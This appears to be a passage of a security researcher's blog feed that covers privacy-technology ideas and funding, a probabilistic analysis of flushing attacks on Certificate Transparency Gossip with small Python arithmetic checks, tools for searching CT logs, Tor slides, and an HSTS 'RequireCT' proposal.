<p>So I could imagine HTTP/3 taking the notion of server push even further. I can easily imagine you downloading some sort of 'pack'. A zipfile, an 'app', whatever you want to call it. It's got some index page or autorun file and the 'app' will load its logic, its style, its images, and maybe even some preloaded personal data all from this pack. Server push taken even further. Periodically, you'll receive updates - new emails will come in, new tweets, new status posts, new ads to display. You might even receive code updates (or just a brand-new pack that causes what we think of today as 'a page refresh' but might in the future be known as an 'app restart').</p>

<p>So if this is what HTTP/3 looks like... where does the Mix Network come in?  Well... Mix Networks provide strong anonymity even in the face of a Global Passive Adversary, but they do this at the cost of speed. (<a href="https://crypto.is/blog/mix_and_onion_networks">You can read more about this over here</a> and in <a href="https://ritter.vg/blog-deanonymizing_amm.html">these slides</a>.) We'd like to use Mix Networks more but there's just no 'killer app' for them. You need something that can tolerate high latency. Recent designs for mix networks (and DC-nets) can cut the latency down quite a bit more from the 'hours to days' of <a href="https://crypto.is/blog/remailers_weve_got">ye olde remailers</a> - but in all cases mix networks need to have enough users to provide a good anonymity set. And email worked as a Mix Network... kinda. You had reliability and spam problems, plus usability issues.</p>

<p>But what if HTTP/3 were the killer app that Mix Networks need? If Tor had a hybrid option - where some requests got mixed (causing higher latency) and others did not (for normal web browsing) - you could imagine a website that loaded its 'pack' over onion routing, and then periodically sent you data updates using a mix network. If I'm leaving my browser sitting idle, and it takes the browser 5 or 10 minutes to alert me I have a new email instead of 1, I think I can live with that. (Especially if I can manually check for new messages.) I really should get less distracted by new emails anyway!</p>

<h3>Sources of Funding</h3>

<p>Okay, so maybe you like one of these ideas or maybe you think they're all shit but you have your own. You can do this. <em>Required Disclaimer: While I am affiliated with some of these, I do not make the first or last funding decision for any of them and am speaking only for myself in this blog post. They may all think my ideas are horrible.</em></p>

<p><a href="https://www.opentech.fund/funding">Open Tech Fund</a> is a great place to bring whole application ideas (or improvements to applications) - stuff like the Privacy Preserving Location Sharing, Secure Mobile Encryption with a PIN, or Authenticated WebRTC Video Chats. Take those to their Internet Freedom Fund. You can also propose ideas to the Core Infrastructure Fund - Encrypted Email Delivery and Encrypted DNS implementations are great examples. In theory, they might take some of the way-far-out-there experiments (Update Transparency, Remote Server Attestation, Mix Networks) - but you'd probably need to put in some legwork first and really suss out your idea and make them believe it can be done.</p>

<p>The Linux Foundation's <a href="https://www.coreinfrastructure.org/">Core Infrastructure Initiative</a> is really focusing on just that - Core Infrastructure. They tend to be interested in ideas that are very, very broadly applicable to the internet, which I have not focused on as much in this post. Better Faster Compiler Hardening is a good candidate, as is grsecurity (but that's a can of worms as I mentioned.) Still, if you can make a good case for how something is truly core infrastructure, you can try!</p>

<p><a href="https://wiki.mozilla.org/MOSS">Mozilla's MOSS</a> program has a track, <a href="https://wiki.mozilla.org/MOSS/Mission_Partners">Mission Partners</a> that is the generic "Support projects that further Mozilla's <a href="https://www.mozilla.org/about/manifesto/">mission</a>" fund. It's the most applicable to the ideas here, although if you can make a good case that Mozilla relies on something you want to develop, you could make a case for the <a href="https://wiki.mozilla.org/MOSS/Foundational_Technology">Foundational Technology</a> fund (maybe compiler hardening or update transparency).</p>

<p>And <a href="https://www.accessnow.org/grants/">there are</a> <a href="https://nlnet.nl/foundation/can_do.html">a lot</a> <a href="https://iscproject.org/request-funding/">more</a> (like <a href="https://www.opentech.fund/apply/alternative-sources-support">a lot more</a>) funding sources out there. Not every source fits every idea of course, but if you want to unshackle yourself from a job doing things you don't care about and work on Liberation Technology - the options are more diverse than you might think.</p>

<h3>Thanks</h3>

<p>This was a big-ass blog post. Errors are my own, but <a href="https://twitter.com/dyn___">Aaron Grattafiori</a> and <a href="https://twitter.com/utkan0s">Drew Suarez</a> helped fix many of them. <a href="https://twitter.com/danblah">Dan Blah</a> pushed me to write it.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-a_bit_on_certificate_transparency_gossip.html</guid>
		<title>A Bit on Certificate Transparency Gossip</title>
		<pubDate>27 Jun 2016 17:17 EDT</pubDate>
		<description><![CDATA[
<style type="text/css">
.aside { color:grey; }
</style>

<p>For the past year and change I've been working with <a href="https://debian-administration.org/users/dkg/weblog">dkg</a> and <a href="https://www.dfri.se/wiki/users/linus/contact.txt">Linus Nordberg</a> on <a href="https://datatracker.ietf.org/doc/draft-ietf-trans-gossip/">Certificate Transparency Gossip</a>.  I'll assume you're familiar with Certificate Transparency (you can read more about it <a href="https://www.certificate-transparency.org/">here</a>.)  The point of CT <em>Gossip</em> is to detect Certificate Transparency logs that have misbehaved (either accidentally, maliciously, or by having been compromised.)

<p>The CT Gossip spec is large, and complicated - perhaps too complicated to be fully implemented! This blog post is not about an overview of the specification, but rather about a nuanced problem we faced during the development - and why we made the decision we made. I'll take this problem largely into the abstract - focusing on the difficulty of providing protections against an intelligent adversary with statistics on their side. I won't reframe the problem or go back to the drawing board here. I imagine someone will want to, and we can have that debate. But right now I want to focus on the problem directly in front of us.

<h4>The Problem</h4>

<p>In several points of the Gossip protocol an entity will have a bucket of items.  We will call the entity the 'server' for simplicity - this is not always the case, but even when it is the web browser (a client), we can model it as a server. So the server has a bucket of items and a client (who will be our adversary) can request items from the bucket. 

<p>The server will respond with a selection of items of its choosing - which items and how many to respond with are choices the server makes. The server also chooses to delete items from the bucket at a time and by a policy of the server's choosing.

<p>What's in the bucket? Well by and large they are innocuous items. But when an adversary performs an attack - evidence of that attack is placed into the bucket. The goal of the adversary is to 'flush' the evidence out of the bucket such that it is not sent to any legitimate clients, and is only sent to the adversary (who will of course delete the evidence of their attack.) Besides requesting items from the bucket, the attacker can place (innocuous) items into the bucket, causing the bucket to require more storage space.

<p>The adversary can create any number of Sybils (or fake identities) - so there's no point in the server trying to track who they send an item to in an effort to send it to a diversity of requestors. We assume this approach will always fail, as the adversary can simply create false identities on different network segments.

<p>Similarly, it's not clear how to distinguish normal client queries from an adversary performing a flushing attack. So we don't make an effort to do so.

<p>Our goal is to define policies for the 'Release' Algorithm (aka 'which items from the bucket do I send') and the 'Deletion' Algorithm (aka 'do I delete this item from the bucket') such that an attacker is unsure about whether or not a particular item (evidence of their attack) actually remains in the bucket - or if they have successfully flushed it.

<h4>Published Literature</h4>

<p>This problem is <em>tantalizingly close</em> to existing problems that exist in mix networks.  Perhaps the best treatment of the flushing attack, and how different mixing algorithms resist it, is <a href="http://freehaven.net/anonbib/cache/trickle02.pdf">From a Trickle to a Flood</a> from 2002. 

<p>But as intimated - while the problem is <em>close</em>, it is not the same. In particular, when (most | deployed) mix networks release a message, they <em>remove</em> it from the server. They do not retain it and send a duplicate of it later. In our situation, the server absolutely does retain items and may send duplicates. This difference is very important. 

<p>The second difference is the attacker's goal. With Mix Networks, the attacker's goal is not to censor or discard messages, but instead to track them. In our model, we do want to eliminate messages from the network.

<h4>Defining The Attacker</h4>

<p>So we have defined the problem: Server has a bucket. Attacker wants to flush an item from the bucket. How can we make the attacker unsure if they've flushed it? But we haven't defined the capabilities of the attacker.

<p>To start with, we assume the attacker knows the algorithm. The server will draw random numbers during it, but the probabilities that actions will be taken are fixed probabilities (or are determined by a known algorithm.)

<p>If we don't place limits on the attacker, we can never win. For example, if the attacker is all-powerful it can just peek inside the bucket. If the attacker can send an infinite number of queries per second - infinity times any small number is still infinity.

<p>So we define the costs and limits. An attacker's cost is <strong>time</strong> and <strong>queries</strong>. They need to complete an attack before sufficient clock time (literally meaning hours or days) elapses, and they need to complete the attack using less than a finite number of queries. This number of queries is actually chosen to be a function of clock time - we assume the attacker has infinite bandwidth and is only gated by how quickly they can generate queries. We also assume the attacker is able to control the network of the server for a <em>limited</em> period of time - meaning they can isolate the server from the internet and ensure the only queries it receives are the attacker's. (Not that the server knows this of course.)

<p>The defender's cost is <strong>disk space</strong>. With infinite disk space, the defender can win - we must design a mechanism that allows the defender to win without using infinite disk space.

<p>An attacker WINS if they can achieve ANY of these three objectives:

<ol>
<li>Determine with certainty greater than 50% whether an item remains in the opponent's bucket while sending fewer than <span style="color:red">M</span> queries to the opponent.
<li>Determine with certainty greater than 50% whether an item remains in the opponent's bucket before <span style="color:red">N</span> amount of time has passed.
<li>Cause the defender to use more than <span style="color:red">O</span> bytes of storage.
</ol>


<p><span style="color:red">M</span> is chosen to be a number of queries that we consider feasible for an attacker to do in a set period of time. <span style="color:red">N</span> is chosen to be long enough that sustaining the attack represents undue political or technical burden on an adversary. <span style="color:red">O</span> is chosen to be a disk space size large enough that client developers or server operators are scared off of deploying Gossip.

<p>Let's nail down <span style="color:red">M</span>. <a href="https://www.rc4nomore.com/">RC4NoMore</a> claims an average of 4450 requests per second from a javascript-driven web browser to a server. They had an incentive to get that number as high as they can, so we're going to use it. We'll pick an arbitrary amount of clock time for the attacker to do this - 2 straight days.  That's 768,960,000 queries or ~768 Million. Now technically, an adversary could actually perform <em>more</em> queries than this in a day under the situation when the 'server' is a real HTTP server, and not the client-we're-treating-as-the-server -- but as you'll see in a bit, we can't provide protection against 768 Million queries, so why use a bigger number?
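That arithmetic is simple enough to sanity-check in a couple of lines:

```python
# The query budget M assumed above: RC4NoMore's claimed 4450 requests
# per second, sustained for two full days.
rps = 4450
seconds_per_day = 60 * 60 * 24
m = rps * seconds_per_day * 2
print(m)  # 768960000, i.e. ~768 million queries
```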

<p>Those numbers are pretty well established, but what about <span style="color:red">N</span> and <span style="color:red">O</span>?  Basically, we can only make a 'good guess' about these.  For example, sustaining a BGP hijack of Twitter or Facebook's routes for more than a short period of time would be both noticeable and potentially damaging politically. TLS MITM attacks have, in the past, been confined to brief periods of time. And <span style="color:red">O</span>? How much disk space is too much? In both cases we'll have to evaluate things in terms of "I know it when I see it."

<h4>An Introduction to the Statistics We'll Need</h4>

<p>Let's dive into the math and see, if we use the structure above, how we might design a defense that meets our 768-million mark.

<p>It turns out, the statistics here aren't that hard.  We'll use a toy example first.

<ul>
<li>When I query the server, it has a 10% chance of returning an object,
if it has it - and it performs this 10% test for each item. <span class="aside">(You'll note that one of the assumptions we make about the 'Retrieval Algorithm' is that it evaluates each item independently.)</span></li>
</ul>

<p>Thanks to the wonder of statistics - if it never sends me the object, there is no way to be <em>certain</em> it does not have it. I could have just gotten really, really unlucky over those umpteen million queries. 

<p>But the <em>probability</em> of being that unlucky, of not receiving the object after N queries if the server has it - that can be calculated. I'll call this, colloquially, being 'confident' to a
certain degree.

<p>How many queries must I make to be 50% confident the server does not
have an object? 75%? 90%?

<ul>
<li>Assume the server has the item. The probability of not receiving the
item after one query is 90%.
<li> After two queries: 90% x 90% or 81%. Successive multiplications yield the following:
<li> ~59% chance of not receiving the item after 5 queries
<li> ~35% chance of not receiving the item after 10 queries
</ul>

<p>The equation is a specific instance of the Binomial Probability Formula:

<pre> F(n) = nCr * p^r * q^(n-r)
      nCr is the 'n choose r' equation:  n! / (r! * (n-r)!)
      p is the probability of the event happening (here .1)
      r is the number of desired outcomes (here it is 0 - we want no item to be returned)
      q is the probability of the event not happening (here 1 - .1 or .9)
      n is the number of trials</pre>

<p>Our equations can be checked:

<ul>
<li> <a href="http://www.wolframalpha.com/input/?i=bin(1,0)+*+.1%5E0+*+.9%5E(1)">F(1) = .9</a>
<li> <a href="http://www.wolframalpha.com/input/?i=bin(5,0)+*+.1%5E0+*+.9%5E(5)">F(5) = .59</a>
<li> <a href="http://www.wolframalpha.com/input/?i=bin(10,0)+*+.1%5E0+*+.9%5E(10)">F(10) = .35</a>
</ul>

<p>I must make <a href="http://www.wolframalpha.com/input/?i=bin(22,0)+*+.1%5E0+*+.9%5E(22)">22 queries to be 90% confident</a> the server does not have the item.

<p>Also worth noting: the equation can thankfully be simplified. Because r is 0, we only need to calculate q^(n) - which matches our initial thought process.
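The simplified form makes all of these numbers easy to check - a quick sketch:

```python
import math

# Checking the toy example above, using the simplified form F(n) = q^n
# (with r = 0, the nCr and p^r terms both equal 1).
q = 0.9  # probability of NOT receiving the item on a single query

def confidence(n):
    """Probability of never having received the item after n queries."""
    return q ** n

print(round(confidence(1), 2))   # 0.9
print(round(confidence(5), 2))   # 0.59
print(round(confidence(10), 2))  # 0.35

# Queries needed to be 90% confident the server lacks the item:
print(math.ceil(math.log(0.10) / math.log(q)))  # 22
```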

<h4>Going Back to the 768 Million</h4>

<p>So here's what to do with this math: I can use this method to figure out what the probability of sending an item will need to be, to defend against an attacker using the definition of winning we define above.  I want .50 = q^(768million). That is to say, I want, after 768 Million queries, an attacker to have a 50% confidence level that the item does not remain in the bucket.

<p>Now it just so happens that Wolfram Alpha can't solve the 768-millionth root of .5, but it can solve the 76.896 millionth root of .5 so we'll go with that.  It's
<a href="http://www.wolframalpha.com/input/?i=76896000th+root+of+.5">.99999999098591</a>.

<p>That is to say, to achieve the 50% confidence level, the probability of sending an item from the bucket needs to be about .00000009%.  
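Python, unlike Wolfram Alpha, has no trouble taking the 768-millionth root of .5 directly - a quick sketch of the calculation:

```python
# Per-query send probability such that, after ~768 million queries, an
# attacker is still only 50% confident the item is gone.
queries = 768_960_000
q = 0.5 ** (1 / queries)  # probability of NOT sending on one query
p_send = 1 - q            # roughly 9e-10, i.e. about .00000009%
print(p_send)
```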

<p>Do you see a problem here? One problem is that I never actually gave the defender the goal of ever <em>sending</em> an item! At this probability, an item has a 50% chance of being sent only after about 768 million requests.  I don't know how long it takes Google to receive that number of visits - but realistically this means the 'evidence of attack' would just never get shared.

<h4>So.... Send it more frequently?</h4>

<p>This math, sending it so infrequently, would surely represent the <em>end game</em>.  In the beginning, we would send the item more frequently, and then the more we send it, the less <em>often</em> we would send it.  We could imagine it as a graph:

<pre>
   |
   |  x
   |   x
   |    x
   |      x
   |        x
   |          x
   |            x
   |              x
   |                 x
   |                    x
   |                        x
   |                             x
   |                                  x
   |                                        x
   |                                                x
   |                                                            x
   |                                                                              x
   +-------------------------------------------------------------------------------</pre>
   
<p>But the problem, remember, is not just figuring out when to <em>send</em> the item, but also when to <em>delete</em> it.  

<h4>Consider Deleting After Sending?</h4>

<p>Let's imagine a simple deletion algorithm. 

<ul>
<li> The server will 'roll for deletion' after sending the item to a client who requests it.
<li> The likelihood of deletion shall be 1%.
</ul>

<p>Now recall in the beginning, after an item is newly placed into the bucket, it shall be sent with high probability. Let's <em>fix</em> this probability at a lowly 40%, and say this probability applies for the first 500 times it is sent.  What is the probability that an item has been deleted by the 500th response?  <a href="http://www.wolframalpha.com/input/?i=1+-+(.99%5E500)">It is 99%.</a> And how many queries are needed on average by the attacker to have the item returned 500 times at 40% probability of sending? It is (thanks to some trial and error) <a href="http://www.wolframalpha.com/input/?i=sum+bin(1249,j)+*+.4%5Ej+*+.6%5E(1249+-+j),j%3D500+to+1249">1249</a>. 

<p>What this means is that an attacker who sends on average 1249 queries in the beginning (right after the evidence of the attack goes into the bucket) can be supremely confident that the item has been deleted.
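Those figures can be reproduced in a couple of lines (a rough sketch; 1250 is the simple expectation, while the exact trial-and-error figure linked above is 1249):

```python
# Probability the item has been deleted by its 500th send, given a 1%
# deletion roll after each send:
p_deleted = 1 - 0.99 ** 500
print(round(p_deleted, 2))  # 0.99

# Average number of queries an attacker needs to trigger 500 sends at
# a 40% per-query send probability:
print(500 / 0.4)  # 1250.0
```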

<p>Then, the attacker sends more queries - but far fewer than the 768-million figure. If the item is not returned in short order, the attacker can be very confident that the item was deleted. This is because at the top of that curve, the likelihood of receiving the item quickly is very good. When the item doesn't appear quickly, it's either because the attacker hit a .000000001% chance of being unlucky - or it's because the item was deleted.

<p>'Rolling for deletion' after an item is sent is a poor strategy - it doesn't work when we want to send the item regularly.


<h4>A Deletion Algorithm That May Work</h4>
<ul>
<li> The server will 'roll for deletion' every hour, and the odds of deleting an item are... we'll say 5%. 
</ul>

<p>We can use the Binomial Probability Formula, again, to calculate how likely we are to delete the item after so many hours.  It's 1 minus the probability of the deletion <em>not</em> occurring, which is .95<sup>num_hours</sup>

<ul>
<li> <a href="http://www.wolframalpha.com/input/?i=1+-+(.95%5E14)">51% chance of deletion after 14 hours</a>
<li> <a href="http://www.wolframalpha.com/input/?i=1+-+(.95%5E24)">71% chance of deletion after 24 hours</a>
<li> <a href="http://www.wolframalpha.com/input/?i=1+-+(.95%5E48)">91% chance of deletion after 48 hours</a>
</ul>

<p>If we use a rough yardstick of 'Two Days' for the attacker's timeframe (with deletion rolls once an hour) to yield a 50% confidence level, the equation becomes <a href="http://www.wolframalpha.com/input/?i=1+-+(48th+root+of+.50)">.50 = q^48</a> or a 1.4% chance of deletion.  
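These probabilities are quick to verify (a sketch, assuming each hourly roll is independent):

```python
# The hourly 'roll for deletion' numbers above, with a 5% roll:
for hours in (14, 24, 48):
    print(hours, round(1 - 0.95 ** hours, 2))  # 0.51, 0.71, 0.91

# Solving for the per-hour probability that yields a 50% chance of
# deletion after 48 hours:
p_hourly = 1 - 0.5 ** (1 / 48)
print(round(p_hourly * 100, 1))  # 1.4 (percent)
```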

<h4>But What About Uncertainty!</h4>

<p>If you're following along closely, you may have realized a flaw with the notion of "1.4% chance of deletion every hour."  While it's true that after 2 days the probability an item is deleted is 50%, <em>an attacker will be able to know if it has been deleted or not!</em>

<p>This is because the attacker is sending tons of queries, and we already determined that trying to keep the attacker in the dark about whether an item is 'in the bucket' requires such a low probability of sending the item that it's infeasible. So the attacker will know whether or not the item is in the bucket, and there's a 50% chance (that the attacker cannot influence) of it being deleted after two days.  

<p>This is not ideal. But it seems to be the best tradeoff we can make.  The attacker will know whether or not the evidence has been erased, but can do nothing to encourage it to be erased. They merely must wait it out.

<h4>But what About Disk Space?</h4>

<p>So far what we've determined is:

<ul>
<li> A deletion algorithm that is based on how often the server sends the item won't work.
<li> A deletion algorithm that is based on time seems like it will work...
</ul>

<p>But we haven't determined how much disk will be <em>used</em> by this algorithm. To calculate this number, we must look at the broader CT and CT Gossip ecosystem.

<p>We store two types of data: STHs, and [SCTs + Cert Chains]. These are stored by both a Web Browser and a Web Server. STHs and SCTs are multiplied by the number of trusted logs in the ecosystem, which we'll place at '20'. We'll make the following size assumptions:

<ul>
<li> The size of a SCT is ~120 bytes.
<li> The size of a STH is ~250 bytes.
<li> A certificate chain is 5KB.
<li> But a disk sector is 4KB, so everything is 4KB, except for the chain which is 8KB. <span class="aside">(Note that this is 'naive storage'. It doesn't include any associated counters or metadata which would increase size, nor does it include more efficient storage mechanisms which would decrease size.)</span>
</ul>

<p>A server's SCT Store will be limited by the number of certificates issued for the domains it is authoritative for, multiplied by the number of logs it trusts. Let's be conservative and say 10,000 certs. <tt>((10000 SCTs * 4 KB * 20 logs) + (10000 Cert Chains * 8 KB)) / 1024 KB/MB = 860MB</tt>.  That's a high number, but it's not impossible for a server.

<p>A server's STH store could in theory store every active STH out there. We limit Gossip to STHs in the past week, and STHs are issued on average once an hour. This would be <tt>(20 logs * 7 days * 24 hours * 4 KB) / 1024 KB/MB = 13.1MB</tt> and that's quite reasonable.

<p>On the client side, a client's STH store would be the same: 13.1MB.

<p>Its SCT store is another story though.  First, there is no time limit for how long I may store a SCT. Second, I store SCTs (and cert chains) for all sites I visit. Let's say the user has visited 10,000 sites, each of which has 3 different certificates with 10 SCTs each. That's <tt>(((10000 Sites * 3 Cert Chains * 8 KB) + (10000 Sites * 3 Certificates * 10 SCTs * 4 KB)) / 1024 KB/MB) / 1024 MB/GB = 1.4 GB</tt>. On a client, that's clearly an unacceptable amount of data.
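All three storage estimates can be reproduced in a few lines (a sketch of the naive sector-rounded math above; 860MB shows up as 859 here purely from rounding):

```python
# Naive storage math: everything rounds up to a 4KB disk sector,
# except a certificate chain which takes 8KB. All sizes in KB.
SCT, CHAIN, STH = 4, 8, 4
LOGS = 20

# Server SCT store: 10,000 certs, one SCT per log, plus chains.
server_scts_mb = (10_000 * SCT * LOGS + 10_000 * CHAIN) / 1024
print(round(server_scts_mb))  # ~859 MB

# STH store (server or client): one STH per log per hour, kept a week.
sth_store_mb = (LOGS * 7 * 24 * STH) / 1024
print(round(sth_store_mb, 1))  # 13.1 MB

# Client SCT store: 10,000 sites, 3 chains each, 10 SCTs per cert.
client_scts_gb = (10_000 * 3 * CHAIN
                  + 10_000 * 3 * 10 * SCT) / 1024 / 1024
print(round(client_scts_gb, 1))  # 1.4 GB
```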

<h4>Deleting Data From the Client</h4>

<p>So what we want to solve is the disk-space-on-the-client problem. If we can solve that we may have a workable solution. A client whose SCT Store is filling up can do one, or more, of the following (plus other proposals I haven't enumerated):

<ul>
<li> Delete data that's already been sent
<li> Delete new, incoming data (freeze the state)
<li> Delete the oldest data
<li> Delete data randomly
</ul>

<p>I argue a mix of the first and last is the best.  Let's rule out the middle two right away.  They are purely deterministic behaviors. If I want to 'hide' a piece of evidence, I could either send it, then fill up the cache to flush it; or flood the cache to fill it up and prevent it from being added.  

<p>On its face, deleting data at random seems like a surefire recipe for failure - an attacker performs an attack (which places the evidence item in the bucket), then floods the bucket with new items. Once the bucket is full, the probability of the evidence item being deleted rises with each new item placed in. (With a 30,000-item cache, the odds of evicting a particular item are <a href="http://www.wolframalpha.com/input/?i=1+-+(29999%2F30000)%5E(21000)">50% after 51,000 queries</a> - 30,000 queries to fill it and 21,000 to have a 50% chance of flushing it.) These numbers are far short of the 768-million-query figure we wish to protect ourselves against.
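A quick sketch of that eviction math:

```python
# Once a 30,000-item cache is full, each flooding insert evicts any
# given item with probability 1/30000.
cache_size = 30_000
floods = 21_000
p_flushed = 1 - (1 - 1 / cache_size) ** floods
print(round(p_flushed, 2))  # ~0.5
```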

<p>Deleting data that's already been sent is a good optimization, but does not solve the problem - if an attacker is flooding a cache, all of the data will be unsent.

<p>We seem to be sunk. In fact - we were unable to come to a generic fix for this attack. The best we can do is make a few recommendations that make the attack <em>slightly</em> more difficult to carry out.

<ol>
<li>Aggressively attempt Inclusion Proof Resolution for SCTs in the cache. If the SCT is resolved, discard the SCT and save the STH. If this particular SCT is not resolved, but others are, save this SCT. If all SCT resolution fails, take no special action.
<li>Prioritize deleting SCTs that have already been sent to the server. If a SCT has been sent to the server, it means it has been sent over a connection that excludes that SCT. If it was a legit SCT, all is well (it's been reported). If it was a malicious SCT - either it's been reported to the legitimate server (and ideally will be identified) or it's been reported to an illegitimate server necessitating a second, illegitimate SCT we have in our cache.
<li>In the future, it may be possible for servers to supply SCTs with Inclusion Proofs to recent STHs; this would allow clients to discard data more aggressively.
</ol>

<h4>Conclusion</h4>

<p>The final recommendation is therefore:

<ul>
<li>Servers and Clients will each store valid STHs without bound. The size needed for this is a function of the number of logs and the validity window (which is one week). The final size is manageable, under 20MB with naive storage.
<li>Servers will store SCTs and Certificate Chains without bound. The size needed for this is a function of the number of certificates issued for domains the server is authoritative for, and the number of logs. The final size is manageable for most servers (under 1GB with naive storage) and can be reduced by whitelisting certain certificates/SCTs to discard.
<li>Clients will store SCTs and Certificate Chains in a fixed-size cache of their choosing, employ strategies to make flushing attacks more difficult, but ultimately remain vulnerable to a persistent flushing attack.
</ul>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-querying_ct_logs.html</guid>
		<title>Querying CT Logs, Looking For Certificates</title>
		<pubDate>25 Mar 2016 2:46 EST</pubDate>
		<description><![CDATA[
<p>Recently I wanted to run a complex query across every certificate in the CT logs.  That would obviously take some time to process - but I was more interested in ease-of-execution than I was in making things as fast as possible.  I ended up using a few tools, and writing a few tools, to make this happen.</p>

<dl>

<dt>catlfish</dt>
<dd><a href="https://git.nordu.net/?p=catlfish.git;a=summary">Catlfish</a> is a CT Log server that's written by a friend (and <a href="https://datatracker.ietf.org/doc/draft-linus-trans-gossip-ct/">CT Gossip coauther</a>). I'm not interested in the log server, just the tools - specifically <a href="https://git.nordu.net/?p=catlfish.git;a=tree;f=tools;h=aa3abeeaa8e4c46a1ad52715ece0ca639815d0ec;hb=HEAD">fetchallcerts.py</a> to download the logs.</dd>

<dt><a href="https://github.com/tomrittervg/ct-tools/blob/master/fetchalllogkeys.py">fetchalllogkeys.py</a></dt>
<dd>fetchallcerts.py requires the log keys, in PEM format. (Not sure why.)  Run this tool to download all the logs' keys.</dd>

<dt><a href="https://github.com/tomrittervg/ct-tools/blob/master/update-all.sh">update-all.sh</a></dt>
<dd>fetchallcerts.py only works on one log at a time. A quick bash script will run this across all logs.</dd>

</dl>

<p>With these tools you can download all the certificates in all the logs <em>except</em> the two logs that use RSA instead of ECC.  (That's CNNIC and Venafi.) They come down in zipfiles and take up about 145 GB.</p>

<p>Now we need to process them!  For that you can use <a href="https://github.com/tomrittervg/ct-tools/blob/master/findcerts.py">findcerts.py</a>.  The script uses python's multiprocessing (one process per CPU) to process one zipfile at a time, and uses pyasn1 and pyx509 to parse the certificates.  You write the filtering function at the top of the file; you can also choose which certs to process (leaf, intermediate(s), and root).  You can limit the filtering to a single zip file (for testing) or to a single log (since logs will often contain duplicates of each other.)</p>

<p>The example criteria I have in there looks for a particular domain name.  This is a silly criteria - there are <em>much</em> faster ways to look for certs matching a domain name.  But if you want to search for a custom extension or combination of extensions - it makes a lot more sense. You can look at <a href="https://github.com/hiviah/pyx509/blob/master/x509_parse.py">pyx509</a> to see what types of structures are exposed to you.</p>

<p>A word on minutia - pyasn1 is slow. It's full featured but it's slow. On the normal library it took about 18 minutes to process a zip file. By using cython and various other tweaks and tricks in both it and pyx509, I was able to get that down to about 4 minutes, 1.5 if you only process leaf certs. So I'd recommend using my branches of <a href="https://github.com/tomrittervg/pyasn1">pyasn1</a> and <a href="https://github.com/tomrittervg/pyx509">pyx509</a>.</p>

<p>All in all, it's definitely not the fastest way to do this - but it was the simplest.  I can run a query across one of the google logs in about 18 hours, which is fast enough for my curiosity for most things.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-all_about_tor.html</guid>
		<title>All About Tor</title>
		<pubDate>14 May 2015 00:04:23 EST</pubDate>
		<description><![CDATA[
<p>A little bit ago <a href="https://us.nccgroup.trust/">NCC Group North America</a> had an all-hands retreat, and solicited technical talks. I fired off a one-line e-mail: "All About Tor - Everything from the Directory Authorities to the Link Protocol to Pluggable Transports to everything in between." And promptly forgot about it for... a couple months. I ended up building the deck, with a level of detail I thought was about 80% of what I wanted, and gave a dry-run for my 45 minute talk.  It ran two full hours.</p>

<p>I cut a bunch of content for the talk, but knew I would need to finish the whole thing and make it available. Which I finally did! The <a href="/p/tor-vlatest.pdf" class="themainlink">slides are available here</a>, and are released CC Attribution-ShareAlike.  The source for the presentation is available in <a href="/p/tor.key">keynote format</a>.</p>

<p>Major thanks to all the folks I bugged to build this, especially Nick Mathewson, and those who gave me feedback on mailing lists.</p>

<p class="center"><a href="/p/tor-vlatest.pdf"><img src="/resources/tor_slides_thumb.png" alt="Thumbnail of slides" /></a></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-require_certificate_transparency.html</guid>
		<title>An Experimental "RequireCT" Directive for HSTS</title>
		<pubDate>20 Feb 2015 10:54:23 EST</pubDate>
		<description><![CDATA[
<p>A little bit ago, while in London at Real World Crypto and hanging out with some browser and SSL folks, I mentioned the thought "Why isn't there a directive in <a href="https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security">HSTS</a> to require OCSP Stapling?" (Or really just hard fail on revocation, but <a href="https://ritter.vg/blog-revocation_paper.html">pragmatically they're the same thing.</a>)  They responded, "I don't know, I don't think anyone's proposed it."  I had batted the idea around a little bit, and ended up <a href="https://www.ietf.org/mail-archive/web/websec/current/msg02297.html">posting about it</a>, but it didn't get much traction.  I still think it's a good idea I'll probably revisit sometime soon... but while thinking more about it and in other conversations a more immediate thought came up.</p>

<p>What about requiring <a href="http://www.certificate-transparency.org/">Certificate Transparency</a>?</p>

<p>The motivation behind requiring Certificate Transparency for your site is to ensure that any certificate used to authenticate your site is publicly logged.  <small>Excepting, of course, locally installed roots which everyone is upset with because of SuperFish. But that's independent of the topic at hand.</small> As a site operator, you can be certain that no one has compromised or coerced a CA, maybe even the CA you chose to <a href="https://tools.ietf.org/html/draft-ietf-websec-key-pinning">pin to</a>, into issuing a certificate for your site behind your back.  Instead, you can see that certificate in a Certificate Transparency log!</p>

<h2>Deployment, and Risks</h2>

<p>I mentioned pinning.  Pinning is a very strong security mechanism, but also a very risky one.  You can lock your users out of your site by incorrectly pinning to the wrong Intermediate CA or losing a backup key.  Requiring CT is also risky. </p>

<p>But, the risk of footgunning yourself is much lower, and similar to requiring OCSP Stapling, is mostly around getting yourself into a situation where your infrastructure can't cash the check your mouth just wrote.  But CT has three ways to get a SCT to the user: a TLS Extension, a Certificate Extension, and an OCSP Extension.  So (in theory) there are more ways to support your decision.</p>

<p>In reality, not so much.  Certificate Authorities are gearing up to support CT, and if you work closely with one, you may even be able to purchase a cert with embedded SCTs.  (<a href="https://www.digicert.com/certificate-transparency/enabling-ct.htm">DigiCert says all you have to do is contact them</a>, <a href="https://groups.google.com/d/msg/certificate-transparency/_BMepQOw8dg/Y3F7SqYhVeUJ">same with Comodo</a>.)  So depending on your choice of CA, you may be able to leverage this mechanism.</p>

<p>Getting an SCT into an OCSP response is probably trickier.  Not only does this require the cooperation of the CA, but because most CAs purchase software and hardware to run their OCSP responders it <em>also</em> likely requires that vendor to do some development.  <s>I'm not aware of any CA that supports this mechanism of delivering SCTs, but I could be wrong.</s> Apparently, <a href="https://groups.google.com/d/msg/certificate-transparency/_BMepQOw8dg/Y3F7SqYhVeUJ">Comodo supports the OCSP delivery option</a>! (And it's very easy for them to enable it, which they so very nicely did for ritter.vg. So you can try it out on this site, live.)</p>

<p>Fortunately, the third mechanism is entirely in your control as the server operator.  You can deliver the SCTs in a TLS extension if the client requests them.  Sounds great right?  Heh.  Let's go on an adventure.  Or, if you want to skip the adventure and just <a href="#ctrequiredfailurescreenshot" class="themainlink">see the screenshots</a>, you can do that too.</p>

